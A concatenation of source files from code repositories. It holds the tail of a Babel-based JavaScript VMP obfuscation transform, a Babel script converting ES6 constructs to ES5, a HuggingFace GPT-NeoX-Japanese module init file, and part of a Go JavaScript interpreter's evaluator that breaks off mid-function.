if (allcans[skeyList[i]][allcans[skeyList[i]].length -1].type === "BreakStatement"){
let f = allcans[skeyList[i]].pop()
bc = allcans[skeyList[i]].concat(cancallzhilw[sjbc]);
bc.push(f)
allcans[skeyList[i]].push(f)
}else {
bc = cancallzhilw[sjbc].concat( allcans[skeyList[i]]);
}
}
zcsz.push(
tee.switchCase(
tee.numericLiteral(cans[skeyList[i]][i2]),
bc
)
)
}
}
path.node.cases = zcsz;
}
}
traverse(ast, parseNode)
return generator(ast).code
}
exports.hsjsvmpTo = hsjsvmpTo;
|
2833844911/cy_jsvmp | 6,188 | tool/es5toes6.js | const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
const { log } = require('console');
const fs = require("fs")
function es6toes5(data) {
var ioio = 0
var ast = parser.parse(data)
let parseData = {
ForOfStatement(path) {
var isduo = 0;
var isduolist = [];
var initOfmyfor, testOfmyfor, upOfmyfor, bodyOfmyfor;
if (path.node.left.type == "VariableDeclaration" && path.node.left.declarations[0].id.type == "Identifier"){
isduolist.push(path.node.left.declarations[0].id)
initOfmyfor = tee.variableDeclaration("var", [path.node.left.declarations[0], tee.variableDeclarator(tee.identifier("cbbiyhh"), tee.numericLiteral(0))])
}else if(path.node.left.type == "VariableDeclaration" && path.node.left.declarations[0].id.type == "ArrayPattern"){
let hxdd =[];
isduo = 1
for (let i =0; i < path.node.left.declarations[0].id.elements.length; i++){
isduolist.push(path.node.left.declarations[0].id.elements[i])
hxdd.push(tee.variableDeclarator(path.node.left.declarations[0].id.elements[i], null))
}
hxdd.push(tee.variableDeclarator(tee.identifier("cbbiyhh"), tee.numericLiteral(0)))
initOfmyfor = tee.variableDeclaration("var", hxdd)
}else if(path.node.left.type == "Identifier"){
isduolist.push(path.node.left)
initOfmyfor = tee.variableDeclaration("var", [tee.variableDeclarator(tee.identifier("cbbiyhh"), tee.numericLiteral(0))])
}else if(path.node.left.type == "ArrayPattern"){
let hxdd =[];
isduo = 1
for (let i =0; i < path.node.left.elements.length; i++){
isduolist.push(path.node.left.elements[i])
}
hxdd.push(tee.variableDeclarator(tee.identifier("cbbiyhh"), tee.numericLiteral(0)))
initOfmyfor = tee.variableDeclaration("var", hxdd)
}else{
log("for of 条件有缺失")
}
testOfmyfor = tee.binaryExpression("<", tee.identifier("cbbiyhh"), tee.memberExpression(path.node.right, tee.identifier("length")))
upOfmyfor = tee.updateExpression("++",tee.identifier("cbbiyhh"),false)
var body = [];
if (isduo === 1){
for (let i =0; i< isduolist.length; i++){
body.push(
tee.expressionStatement(tee.assignmentExpression("=", isduolist[i], tee.memberExpression(tee.memberExpression(path.node.right, tee.identifier("cbbiyhh"),true,false), tee.numericLiteral(i),true,false)))
)
}
}else{
body.push(
tee.expressionStatement( tee.assignmentExpression("=", isduolist[0], tee.memberExpression(path.node.right, tee.identifier("cbbiyhh"),true,false)))
)
}
if (path.node.body.type == "BlockStatement"){
body = body.concat(path.node.body.body)
}else{
body.push(path.node.body)
}
bodyOfmyfor = tee.blockStatement(
body
)
var forme = tee.forStatement(initOfmyfor, testOfmyfor, upOfmyfor, bodyOfmyfor)
path.replaceInline(forme)
},
UpdateExpression(path){
if (path.node.prefix === false){
var hm = path.node.argument
var hmk = path.node.operator
path.replaceInline(hm)
path.insertAfter(tee.updateExpression(hmk,hm, true))
path.skip()
}
},
ObjectExpression(path){
var ofg = {}
var off = 0
var hj = path.get("properties")
for (let i=0; i< hj.length; i++){
if (hj[i].node.type === "ObjectMethod"){
if (hj[i].node.kind === "method"){
hj[i].replaceInline( tee.objectProperty(hj[i].node.key, tee.functionExpression(null,hj[i].node.params, hj[i].node.body)))
continue
}
off = 1
if (!ofg[hj[i].node.key.name]){
ofg[hj[i].node.key.name] = {}
ofg[hj[i].node.key.name]['keyme'] = []
ofg[hj[i].node.key.name]['value'] = tee.ObjectExpression(ofg[hj[i].node.key.name]['keyme'])
}
ofg[hj[i].node.key.name]['keyme'].push(
tee.ObjectProperty(tee.valueToNode(hj[i].node.kind), tee.functionExpression(null,hj[i].node.params, hj[i].node.body))
);
hj[i].remove()
}
}
if (off === 1){
let vvh;
if(path.parentPath.isAssignmentExpression()){
vvh = path.parentPath.node.left;
}else if (path.parentPath.isVariableDeclarator()){
vvh = path.parentPath.node.id;
}
for (let i in ofg){
let jipo = tee.assignmentExpression("=",
tee.identifier("cbbbbyhhhh"+ioio),
tee.callExpression(
tee.memberExpression(tee.identifier("Object"),tee.identifier("defineProperty")),
[
vvh,tee.valueToNode(i), ofg[i]['value']
]
)
)
ioio+=1
path.parentPath.insertAfter(jipo)
}
}
}
}
traverse(ast, parseData)
var data = generator(ast).code
return data;
}
exports.es6toes5 = es6toes5;
// var data = fs.readFileSync('./test.js') + ''
// var f = es6toes5(data);
// fs.writeFileSync("../out.js", f, (e)=>{})
//
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,154 | src/transformers/models/gpt_neox_japanese/__init__.py | # Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...file_utils import _LazyModule, is_torch_available
from ...utils import OptionalDependencyNotAvailable
_import_structure = {
"configuration_gpt_neox_japanese": ["GPT_NEOX_JAPANESE_PRETRAINED_CONFIG_ARCHIVE_MAP", "GPTNeoXJapaneseConfig"],
"tokenization_gpt_neox_japanese": ["GPTNeoXJapaneseTokenizer"],
}
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_gpt_neox_japanese"] = [
"GPT_NEOX_JAPANESE_PRETRAINED_MODEL_ARCHIVE_LIST",
"GPTNeoXJapaneseForCausalLM",
"GPTNeoXJapaneseLayer",
"GPTNeoXJapaneseModel",
"GPTNeoXJapanesePreTrainedModel",
]
if TYPE_CHECKING:
from .configuration_gpt_neox_japanese import GPT_NEOX_JAPANESE_PRETRAINED_CONFIG_ARCHIVE_MAP, GPTNeoXJapaneseConfig
from .tokenization_gpt_neox_japanese import GPTNeoXJapaneseTokenizer
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_gpt_neox_japanese import (
GPT_NEOX_JAPANESE_PRETRAINED_MODEL_ARCHIVE_LIST,
GPTNeoXJapaneseForCausalLM,
GPTNeoXJapaneseLayer,
GPTNeoXJapaneseModel,
GPTNeoXJapanesePreTrainedModel,
)
else:
import sys
sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
2833844911/gojsvmp | 77,315 | evaluator/evaluator.go | package evaluator
import (
"bufio"
"encoding/base64"
"fmt"
"math"
"myvmp/ast"
"myvmp/banding"
"myvmp/lexer"
"myvmp/object"
"myvmp/parse"
"myvmp/parseToDt"
"myvmp/promise"
"myvmp/require"
"myvmp/token"
"os"
"strconv"
"strings"
"sync"
"unicode/utf8"
)
var Zhidy map[string]*func([]*object.Object) object.Object
func binString(dtt string, dttr string, typee string) object.Object {
switch typee {
case token.ADD:
return &object.StringObject{Value: dtt + dttr}
case token.SDD: // 这里可能是返回数字
return &object.NanObject{}
case token.CHEN: // 这里可能是返回数字
return &object.NanObject{}
case token.CHU: // 这里可能是返回数字
return &object.NanObject{}
case token.XIAOYHYH:
return &object.NumericObject{Value: 0}
case token.XIAOYHYHYH:
return &object.NumericObject{Value: 0}
case token.DAYHYH:
return &object.NumericObject{Value: 0}
case token.YIHUO:
return &object.NumericObject{Value: 0}
case token.DAYHYHYU:
return &object.NumericObject{Value: 0}
case token.XIAND:
return &object.BoolObject{Value: dtt == dttr}
case token.XIAOYH:
return &object.BoolObject{Value: dtt < dttr}
case token.DAYH:
return &object.BoolObject{Value: dtt > dttr}
case token.DAYHDY:
return &object.BoolObject{Value: dtt >= dttr}
case token.XIAOYHDY:
return &object.BoolObject{Value: dtt <= dttr}
case token.BUDY:
return &object.BoolObject{Value: dtt != dttr}
case token.BUDYDY:
return &object.BoolObject{Value: dtt != dttr}
}
return &object.NanObject{}
}
func binInt(dtt float64, dttr float64, typee string) object.Object {
switch typee {
case token.ADD:
return &object.NumericObject{Value: dtt + dttr}
case token.SDD: // 这里可能是返回数字
return &object.NumericObject{Value: dtt - dttr}
case token.KAIFAN: // 这里可能是返回数字
num := math.Pow(dtt, dttr)
return &object.NumericObject{Value: num}
case token.CHEN: // 这里可能是返回数字
return &object.NumericObject{Value: dtt * dttr}
case token.CHU: // 这里可能是返回数字
return &object.NumericObject{Value: dtt / dttr}
case token.XIAOYHYH:
return &object.NumericObject{Value: float64(int64(dtt) << int64(dttr))}
case token.XIAOYHYHYH:
dsd := float64(int64(dtt)<<int64(dttr) + 100)
return &object.NumericObject{Value: dsd}
case token.DAYHYH:
return &object.NumericObject{Value: float64(int64(dtt) >> int64(dttr))}
case token.QUYU:
return &object.NumericObject{Value: float64(int64(dtt) % int64(dttr))}
case token.DAYHYHYU:
return &object.NumericObject{Value: float64(int64(dtt) >> int64(dttr))}
case token.XIAND:
return &object.BoolObject{Value: dtt == dttr}
case token.XIAOYH:
return &object.BoolObject{Value: dtt < dttr}
case token.DAYH:
return &object.BoolObject{Value: dtt > dttr}
case token.DAYHDY:
return &object.BoolObject{Value: dtt >= dttr}
case token.YIHUO:
return &object.NumericObject{Value: float64(int(dtt) ^ int(dttr))}
case token.XIAOYHDY:
return &object.BoolObject{Value: dtt <= dttr}
case token.BUDY:
return &object.BoolObject{Value: dtt != dttr}
case token.BUDYDY:
return &object.BoolObject{Value: dtt != dttr}
case token.HUO:
return &object.BoolObject{Value: dtt != 0 || dttr != 0}
case token.HUOHUO:
ds := &object.NumericObject{Value: dtt}
var dsj object.Object = ds
dsr := &object.NumericObject{Value: dttr}
var dsjr object.Object = dsr
if getBoolInfo(&dsj).Value {
return ds
} else if getBoolInfo(&dsjr).Value {
return dsr
}
return &object.BoolObject{Value: false}
case token.YU:
return &object.BoolObject{Value: dtt != 0 && dttr != 0}
case token.YUYU:
return &object.BoolObject{Value: dtt != 0 && dttr != 0}
}
return nil
}
func yunxBin(dtt *ast.Statement, env *object.Environment) object.Object {
ddd := (*dtt).(*ast.BinaryExpression)
leftData := ParseData(&ddd.Left, env)
if ddd.Operator == token.YUYU {
jj := getBoolInfo(&leftData)
if !jj.Value {
return &jj
}
} else if ddd.Operator == token.HUOHUO {
jj := getBoolInfo(&leftData)
if jj.Value {
return leftData
}
}
rightData := ParseData(&ddd.Right, env)
if leftData.Type() == token.TYNUM && rightData.Type() == token.TYNUM {
return binInt(leftData.(*object.NumericObject).Value, rightData.(*object.NumericObject).Value, ddd.Operator)
} else if leftData.Type() == token.BOOL && rightData.Type() == token.BOOL {
var zuo float64
if leftData.(*object.BoolObject).Value {
zuo = 1
} else {
zuo = 0
}
var yuo float64
if rightData.(*object.BoolObject).Value {
yuo = 1
} else {
yuo = 0
}
return binInt(zuo, yuo, ddd.Operator)
} else if leftData.Type() == token.TYNUM && rightData.Type() == token.BOOL {
var zuo float64
zuo = leftData.(*object.NumericObject).Value
var yuo float64
if rightData.(*object.BoolObject).Value {
yuo = 1
} else {
yuo = 0
}
return binInt(zuo, yuo, ddd.Operator)
} else if leftData.Type() == token.BOOL && rightData.Type() == token.TYNUM {
var zuo float64
if leftData.(*object.BoolObject).Value {
zuo = 1
} else {
zuo = 0
}
var yuo float64
yuo = rightData.(*object.NumericObject).Value
return binInt(zuo, yuo, ddd.Operator)
} else {
if rightData.Type() == token.ArrayE && leftData.Type() == token.ArrayE && (ddd.Operator == token.DXIAND || ddd.Operator == token.XIAND || ddd.Operator == token.BUDY || ddd.Operator == token.BUDYDY) {
nkl := rightData.(*object.Environment)
nkle := leftData.(*object.Environment)
switch ddd.Operator {
case token.DXIAND:
return &object.BoolObject{Value: nkl == nkle}
case token.XIAND:
return &object.BoolObject{Value: nkl == nkle}
case token.BUDY:
return &object.BoolObject{Value: nkl != nkle}
case token.BUDYDY:
return &object.BoolObject{Value: nkl != nkle}
}
} else if rightData.Type() == token.Object && leftData.Type() == token.Object && (ddd.Operator == token.DXIAND || ddd.Operator == token.XIAND || ddd.Operator == token.BUDY || ddd.Operator == token.BUDYDY) {
nkl := rightData.(*object.Environment)
nkle := leftData.(*object.Environment)
switch ddd.Operator {
case token.DXIAND:
return &object.BoolObject{Value: nkl == nkle}
case token.XIAND:
return &object.BoolObject{Value: nkl == nkle}
case token.BUDY:
return &object.BoolObject{Value: nkl != nkle}
case token.BUDYDY:
return &object.BoolObject{Value: nkl != nkle}
}
} else if (rightData.Type() == token.ENV || rightData.Type() == token.THIS) && (leftData.Type() == token.ENV || rightData.Type() == token.THIS) && (ddd.Operator == token.DXIAND || ddd.Operator == token.XIAND || ddd.Operator == token.BUDY || ddd.Operator == token.BUDYDY) {
nkl := rightData.(*object.Environment)
nkle := leftData.(*object.Environment)
switch ddd.Operator {
case token.DXIAND:
return &object.BoolObject{Value: nkl == nkle}
case token.XIAND:
return &object.BoolObject{Value: nkl == nkle}
case token.BUDY:
return &object.BoolObject{Value: nkl != nkle}
case token.BUDYDY:
return &object.BoolObject{Value: nkl != nkle}
}
}
rightStr := rightData.ToString()
leftStr := leftData.ToString()
return binString(leftStr, rightStr, ddd.Operator)
}
return rightData
}
func yunxINT(dtt *ast.Statement) object.Object {
ddd := (*dtt).(*ast.NumericLiteral).Value
return &object.NumericObject{
Value: ddd,
}
}
func yunxStr(dtt *ast.Statement) object.Object {
ddd := (*dtt).(*ast.StringLiteral).Value
return &object.StringObject{
Value: ddd,
}
}
func yunxVar(dtt *ast.Statement, env *object.Environment) object.Object {
ddd := (*dtt).(*ast.VariableDeclaration)
qianmdy := ddd.Declarations
hmd := ParseData(&ddd.Init, env)
for _, key := range qianmdy {
//(*env).Store[key.Name] = hmd
ddd := (*key).(*ast.Identifier)
(*env).Store.Set(ddd.Name, hmd)
}
return nil
}
func yunxIDENT(dtt *ast.Statement, env *object.Environment) object.Object {
ddd := (*dtt).(*ast.Identifier)
data := findKey(ddd.Name, env)
return data
}
func getBoolInfo(dt *object.Object) object.BoolObject {
if *dt == nil {
return object.BoolObject{Value: false}
}
tb := (*dt).Type()
switch tb {
case token.BOOL:
return *((*dt).(*object.BoolObject))
case token.TYNUM:
dtee := (*dt).(*object.NumericObject)
if dtee.Value == 0 {
return object.BoolObject{Value: false}
} else {
return object.BoolObject{Value: true}
}
case token.NULL:
return object.BoolObject{Value: false}
case token.NANINFO:
return object.BoolObject{Value: false}
}
return object.BoolObject{Value: true}
}
func hebing(as ast.Statement, rightData object.Object, optt string, env *object.Environment) object.Object {
switch optt {
case token.DENYU:
return rightData
case token.JIADEN:
leftData := ParseData(&as, env)
if leftData.Type() == token.TYNUM && rightData.Type() == token.TYNUM {
return binInt(leftData.(*object.NumericObject).Value, rightData.(*object.NumericObject).Value, token.ADD)
} else {
rightStr := rightData.ToString()
leftStr := leftData.ToString()
return binString(leftStr, rightStr, token.ADD)
}
case token.JANDEN:
leftData := ParseData(&as, env)
if leftData.Type() == token.TYNUM && rightData.Type() == token.TYNUM {
return binInt(leftData.(*object.NumericObject).Value, rightData.(*object.NumericObject).Value, token.SDD)
} else {
rightStr := rightData.ToString()
leftStr := leftData.ToString()
return binString(leftStr, rightStr, token.SDD)
}
}
return nil
}
func yunxAss(dtt *ast.Statement, env *object.Environment) object.Object {
ddd := (*dtt).(*ast.AssignmentExpression)
Valuee := ParseData(&ddd.Right, env)
Value := hebing(ddd.Left, Valuee, ddd.Operator, env)
key := ddd.Left //之后需要判断是否对象
if key.StatementNode() == token.IDENT {
data := setKey(key.(*ast.Identifier).Name, Value, env)
return data
}
if key.StatementNode() == token.Member {
keyValue := key.(*ast.MemberExpression)
mnnn := ParseData(&keyValue.Object, env)
zkey := ParseData(&keyValue.Property, env)
if mnnn.Type() == token.BYTE {
zkey2 := zkey.(*object.NumericObject)
Value2 := Value.(*object.NumericObject)
dmmm := mnnn.(*object.ByteObject)
dmmm.Value[int(zkey2.Value)] = byte(Value2.Value)
} else {
nj := mnnn.(*object.Environment)
if nj.Type() == token.ArrayE && zkey.Type() == token.TYNUM {
zkey2 := zkey.(*object.NumericObject)
if int(zkey2.Value) >= len(nj.Value) {
// 扩展切片到足够的长度
newSlice := make([]*object.Object, int(zkey2.Value)+1)
copy(newSlice, nj.Value)
nj.Value = newSlice
}
nj.Value[int(zkey2.Value)] = &Value
} else {
var strkey string
if zkey.Type() == token.TYNUM {
zkey2 := zkey.(*object.NumericObject)
strkey = strconv.Itoa(int(zkey2.Value))
} else {
zkey2 := zkey.(*object.StringObject)
strkey = zkey2.Value
}
//nj.Store[strkey] = Value
nj.Store.Set(strkey, Value)
//setKey(strkey, Value, nj)
}
}
}
return Value
}
func yunxUpINfo(key ast.Statement, env *object.Environment, Value object.Object) object.Object {
if key.StatementNode() == token.IDENT {
data := setKey(key.(*ast.Identifier).Name, Value, env)
return data
}
if key.StatementNode() == token.Member {
keyValue := key.(*ast.MemberExpression)
mnnn := ParseData(&keyValue.Object, env)
zkey := ParseData(&keyValue.Property, env)
nj := mnnn.(*object.Environment)
if nj.Type() == token.ArrayE && zkey.Type() == token.TYNUM {
zkey2 := zkey.(*object.NumericObject)
if int(zkey2.Value) >= len(nj.Value) {
// 扩展切片到足够的长度
newSlice := make([]*object.Object, int(zkey2.Value)+1)
copy(newSlice, nj.Value)
nj.Value = newSlice
}
nj.Value[int(zkey2.Value)] = &Value
} else {
var strkey string
if zkey.Type() == token.TYNUM {
zkey2 := zkey.(*object.NumericObject)
strkey = strconv.Itoa(int(zkey2.Value))
} else {
zkey2 := zkey.(*object.StringObject)
strkey = zkey2.Value
}
//nj.Store[strkey] = Value
nj.Store.Set(strkey, Value)
//setKey(strkey, Value, nj)
}
}
return Value
}
func yunxIfStat(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.IfStatement)
test := ParseData(&dt.Test, env)
boInfo := getBoolInfo(&test)
if boInfo.Value {
ds := ParseData(&dt.Consequent, env)
if ds != nil && ds.Type() == token.BREAK {
return ds
} else if ds != nil && ds.Type() == token.CONTINUE {
return ds
} else if ds != nil && ds.Type() == token.RETURN {
return ds
}
} else {
ds := ParseData(&dt.Alternate, env)
if ds != nil && ds.Type() == token.BREAK {
return ds
} else if ds != nil && ds.Type() == token.CONTINUE {
return ds
} else if ds != nil && ds.Type() == token.RETURN {
return ds
}
}
return nil
}
func yunxBlock(dtt *ast.Statement, envup *object.Environment) object.Object {
env := object.NewEnv(envup)
blockList := (*dtt).(*ast.BlockStatement).Body
for _, dt := range blockList {
dg := ParseData(dt, env)
if dg != nil && dg.Type() == token.BREAK {
return dg
} else if dg != nil && dg.Type() == token.CONTINUE {
return dg
} else if dg != nil && dg.Type() == token.RETURN {
return dg
}
}
return nil
}
func yunxBleak(dtt *ast.Statement, envup *object.Environment) object.Object {
return &object.BreakObject{}
}
func yunxCONTINUE(dtt *ast.Statement, envup *object.Environment) object.Object {
return &object.ContinueObject{}
}
func yunxUnary(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.UnaryExpression)
qiand := dt.Operator
switch qiand {
case token.TYPEOF:
dgg := ParseData(&dt.Argument, env)
return &object.StringObject{Value: dgg.Type()}
case token.QUFAN:
dgg := ParseData(&dt.Argument, env)
boolinfo := getBoolInfo(&dgg)
return &object.BoolObject{Value: !boolinfo.Value}
case token.UPADD:
dgg := ParseData(&dt.Argument, env)
ds := dgg.Type()
switch ds {
case token.TYNUM:
ks := dgg.(*object.NumericObject)
//ji := ks.Value
var dada float64
if dt.Prefix {
dada = ks.Value + 1
} else {
dada = ks.Value
}
yunxUpINfo(dt.Argument, env, &object.NumericObject{Value: ks.Value + 1})
return &object.NumericObject{Value: dada}
default:
return &object.NanObject{}
}
case token.UPASD:
dgg := ParseData(&dt.Argument, env)
ds := dgg.Type()
switch ds {
case token.TYNUM:
ks := dgg.(*object.NumericObject)
var dada float64
fmt.Println(dt.Prefix)
if dt.Prefix {
dada = ks.Value - 1
} else {
dada = ks.Value
}
yunxUpINfo(dt.Argument, env, &object.NumericObject{Value: ks.Value - 1})
return &object.NumericObject{Value: dada}
default:
return &object.NanObject{}
}
case token.SDD:
dgg := ParseData(&dt.Argument, env)
ddddd := dgg.(*object.NumericObject)
return &object.NumericObject{Value: -ddddd.Value}
}
return nil
}
func yunxArrayE(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.ArrayExpression)
dtte := object.NewArray()
for _, cle := range dt.Elements {
lppem := ParseData(cle, env)
dtte.Value = append(dtte.Value, &lppem)
}
return &dtte
}
func yunxFuncD(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.FunctionDeclaration)
idN := dt.Id.(*ast.Identifier)
dddfff := object.FunctionDeclarationObject{Params: dt.Params, Body: dt.Body, Env: env}
//env.Store[idN.Name] = &dddfff
env.Store.Set(idN.Name, &dddfff)
return nil
}
func yunxFuncE(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.FunctionExpression)
dddfff := object.FunctionDeclarationObject{Params: dt.Params, Body: dt.Body, Env: env}
return &dddfff
}
func yunxRETURN(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.ReturnStatement)
retuVal := ParseData(&dt.Argument, env)
dddfff := object.ReturnStatementObject{}
dddfff.Value = retuVal
return &dddfff
}
func yunxCall(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.CallExpression)
//if dt.Caller.StatementNode() == token.IDENT {
// bbb := dt.Caller.(*ast.Identifier).Name
//
//}
funct := ParseData(&dt.Caller, env)
dbb := []*object.Object{}
for _, hh := range dt.Arguments {
arg := ParseData(hh, env)
dbb = append(dbb, &arg)
}
if funct.Type() == token.BULLE && dt.Caller.StatementNode() == token.IDENT {
jiii := dt.Caller.(*ast.Identifier)
vay, ok := Zhidy[jiii.Name]
if ok {
return (*vay)(dbb)
}
}
if funct.Type() == token.TYSTR {
kppp := funct.(*object.StringObject)
if kppp.Key == token.Slice {
ldasd0 := (*dbb[0]).(*object.NumericObject)
ldasd1 := (*dbb[1]).(*object.NumericObject)
return &object.StringObject{
Value: kppp.Slice(int(ldasd0.Value), int(ldasd1.Value)),
}
}
} else if funct.Type() == token.ArrayE {
kppp := funct.(*object.Environment)
if kppp.Key == token.Slice {
ldasd0 := (*dbb[0]).(*object.NumericObject)
ldasd1 := (*dbb[1]).(*object.NumericObject)
kkoo := kppp.Slice(int(ldasd0.Value), int(ldasd1.Value))
nkk := object.NewArray()
nkk.Value = kkoo
return &nkk
}
}
//异步太快问题
dasd := 0
for {
if funct.Type() != token.NULL {
break
}
dasd += 1
if dasd > 100000000 {
fmt.Println("没有找到可以执行的函数")
os.Exit(0)
}
}
kfunob := (funct).(*object.FunctionDeclarationObject)
kfunob.Args = dbb
var fuenv *object.Environment
if dt.Caller.StatementNode() == token.Member {
//if kfunob.Env == nil {
// dgg := dt.Caller.(*ast.MemberExpression)
// kff := ParseData(&dgg.Object, env)
// if kff.Type() == token.THIS {
// bjjj := kff.(*object.Environment)
// fuenv = object.NewEnv(bjjj)
// }
//} else {
// fuenv = kfunob.Env
//}
fuenv = kfunob.Env
} else {
fuenv = object.NewEnv(env)
}
if kfunob.Callthis == 1 {
dadshkj := (*dbb[0]).(*object.Environment)
fuenv = dadshkj
dbb = dbb[1:]
} else if kfunob.Callthis == 2 {
dadshkj := (*dbb[0]).(*object.Environment)
fuenv = dadshkj
dasd := (*dbb[1]).(*object.Environment)
dbb = dasd.Value
}
for idx, vkey := range kfunob.Params {
zzkey := (*vkey).(*ast.Identifier).Name
if idx >= len(dbb) {
//fuenv.Store[zzkey] = &object.NULLObject{}
fuenv.Store.Set(zzkey, &object.NULLObject{})
continue
}
//fuenv.Store[zzkey] = *dbb[idx]
fuenv.Store.Set(zzkey, *dbb[idx])
}
knn := object.NewArray()
knn.Value = dbb
fuenv.Store.Set(token.Arguments, &knn)
if kfunob.IsNative == 1 {
return (*kfunob.NativeBody)(kfunob)
}
djii := ParseData(&kfunob.Body, fuenv)
if djii == nil {
return &object.NULLObject{}
}
if djii.Type() == token.RETURN {
dd := djii.(*object.ReturnStatementObject)
return dd.Value
}
return djii
}
func yunxMember(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.MemberExpression)
left := ParseData(&dt.Object, env)
right := ParseData(&dt.Property, env)
//fmt.Println(left)
//if left == nil {
// fmt.Println()
//}
if left.Type() == token.FUN && right.Type() == token.TYSTR {
dasda := left.(*object.FunctionDeclarationObject)
dasd := right.(*object.StringObject).Value
if dasd == token.CALL {
dasda.Callthis = 1
return dasda
} else if dasd == token.APPLY {
dasda.Callthis = 2
return dasda
}
}
if left.Type() == token.ArrayE {
dsg := left.(*object.Environment)
if right.Type() == token.TYNUM {
hjj := right.(*object.NumericObject)
lpINt := int(hjj.Value)
if len(dsg.Value) <= lpINt {
return &object.NULLObject{}
}
lpffffp := dsg.Value[lpINt]
if lpffffp == nil {
return &object.NULLObject{}
}
return *lpffffp
} else {
hjj := right.(*object.StringObject)
lpffffp, _ := dsg.Store.Get(hjj.Value)
if lpffffp == nil {
if right.ToString() == token.Slice {
lkkk := left.(*object.Environment)
lkkk.Key = token.Slice
return left
} else if right.ToString() == token.Length {
lkkk := left.(*object.Environment)
ddd := &object.NumericObject{Value: float64(len(lkkk.Value))}
return ddd
}
return &object.NULLObject{}
}
if lpffffp.Type() == token.FUN {
jj := left.(*object.Environment)
lpffffp.(*object.FunctionDeclarationObject).Env = jj
}
return lpffffp
}
} else {
if left.Type() == token.BYTE && right.Type() == token.TYSTR && right.ToString() == token.Length {
dd := left.(*object.ByteObject)
return &object.NumericObject{Value: float64(len(dd.Value))}
}
if left.Type() == token.BYTE && right.Type() == token.TYNUM {
dd := left.(*object.ByteObject)
ddIdx := right.(*object.NumericObject).Value
return &object.NumericObject{Value: float64(dd.Value[int(ddIdx)])}
}
var key string
if right.Type() == token.TYNUM {
if left.Type() == token.TYSTR {
hjj := right.(*object.NumericObject)
lkkk := left.(*object.StringObject)
// 将字符串转换为 rune 切片
runes := []rune(lkkk.Value)
return &object.StringObject{Value: string(runes[int64(hjj.Value):int64(hjj.Value+1)])}
} else {
hjj := right.(*object.NumericObject)
key = strconv.Itoa(int(hjj.Value))
}
} else {
if left.Type() == token.TYSTR {
if right.ToString() == token.Length {
lkkk := left.(*object.StringObject)
ddd := &object.NumericObject{Value: float64(utf8.RuneCountInString(lkkk.Value))}
return ddd
}
//hjj := right.(*object.StringObject)
lkkk := left.(*object.StringObject)
lkkk.Key = token.Slice
return left
} else {
hjj := right.(*object.StringObject)
key = hjj.Value
}
}
jh := findKey(key, left.(*object.Environment))
if jh == nil || jh.Type() == token.NULL {
if left.Type() == token.Object && right.ToString() == token.Length {
lkkk := left.(*object.Environment)
ddd := &object.NumericObject{Value: float64(len(lkkk.Store.M))}
return ddd
}
return &object.NULLObject{}
}
if jh.Type() == token.FUN {
jj := left.(*object.Environment)
jh.(*object.FunctionDeclarationObject).Env = jj
}
return jh
}
}
func yunxFOR(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.ForStatement)
init := dt.Init
test := dt.Test
updata := dt.Updata
body := dt.Body
if init != nil {
ParseData(&init, env)
}
for {
if test != nil {
lppp := ParseData(&test, env)
if !getBoolInfo(&lppp).Value {
break
}
}
kf := ParseData(&body, env)
if updata != nil {
ParseData(&updata, env)
}
if kf != nil && kf.Type() == token.BREAK {
break
} else if kf != nil && kf.Type() == token.CONTINUE {
continue
} else if kf != nil && kf.Type() == token.RETURN {
return kf
}
}
return nil
}
func yunxFOI(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.ForInStatement)
init := dt.Left
right := ParseData(&dt.Right, env)
dtall := make([]object.Object, 0)
if right.Type() == token.Object || right.Type() == token.ENV || right.Type() == token.THIS {
dsgre := right.(*object.Environment)
for key, _ := range dsgre.Store.M {
dtall = append(dtall, &object.StringObject{Value: key})
}
} else if token.ArrayE == right.Type() {
dsgre := right.(*object.Environment)
for i := 0; i < len(dsgre.Value); i++ {
dtall = append(dtall, &object.NumericObject{Value: float64(i)})
}
} else {
fmt.Println("can not for in the object !")
os.Exit(0)
}
body := dt.Body
if init != nil {
ParseData(&init, env)
}
needgbkey := (*init.(*ast.VariableDeclaration).Declarations[0]).(*ast.Identifier).Name
for u := 0; u < len(dtall); u++ {
env.Store.Set(needgbkey, dtall[u])
kf := ParseData(&body, env)
if kf != nil && kf.Type() == token.BREAK {
break
} else if kf != nil && kf.Type() == token.CONTINUE {
continue
} else if kf != nil && kf.Type() == token.RETURN {
return kf
}
}
return nil
}
func yunxObject(dtt *ast.Statement, env *object.Environment) object.Object {
dt := (*dtt).(*ast.ObjectExpression)
dtte := object.NewObject()
dtte.Outer = env
for _, cle := range dt.Properties {
das := (*cle).(*ast.Property)
key := das.Key.StatementNode()
var keyv string
if key == token.Stri {
lppp := das.Key
keyv = lppp.(*ast.StringLiteral).Value
} else if key == token.IDENT {
lppp := das.Key
keyv = lppp.(*ast.Identifier).Name
}
lppem := ParseData(&das.Value, env)
dtte.Store.Set(keyv, lppem)
}
return &dtte
}
func Try(fn func(*ast.Statement, *object.Environment) object.Object, ass *ast.Statement, dddd *object.Environment) (err error) {
defer func() {
if r := recover(); r != nil {
